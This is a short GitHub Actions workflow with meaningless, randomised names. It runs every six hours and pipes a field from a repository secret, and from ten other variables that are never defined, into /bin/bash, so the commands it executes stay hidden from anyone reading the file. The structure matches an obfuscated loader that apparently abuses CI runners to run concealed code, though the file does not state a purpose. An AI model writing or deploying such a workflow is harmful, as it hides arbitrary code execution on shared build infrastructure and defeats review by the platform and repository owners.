name: liulijun1819

on:
  workflow_dispatch:
  schedule:
    - cron: '3 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: liulijun1819
        env:
          eccgs524: ${{ secrets.eccgs524 }}
        run: |
          echo $eccgs524 | jq -r .rl9156 | /bin/bash
          echo $lpcik3992 | jq -r .eun9849 | /bin/bash
          echo $ns5 | jq -r .mx8 | /bin/bash
          echo $tzxv65 | jq -r .dxe46420 | /bin/bash
          echo $dc0639 | jq -r .sahtb8 | /bin/bash
          echo $jmvo5582 | jq -r .nift38 | /bin/bash
          echo $gwj2 | jq -r .az84 | /bin/bash
          echo $fo1 | jq -r .i8447 | /bin/bash
          echo $ewpps0 | jq -r .by785 | /bin/bash
          echo $bqml93 | jq -r .ngx690 | /bin/bash
          echo $bh95 | jq -r .g134 | /bin/bash

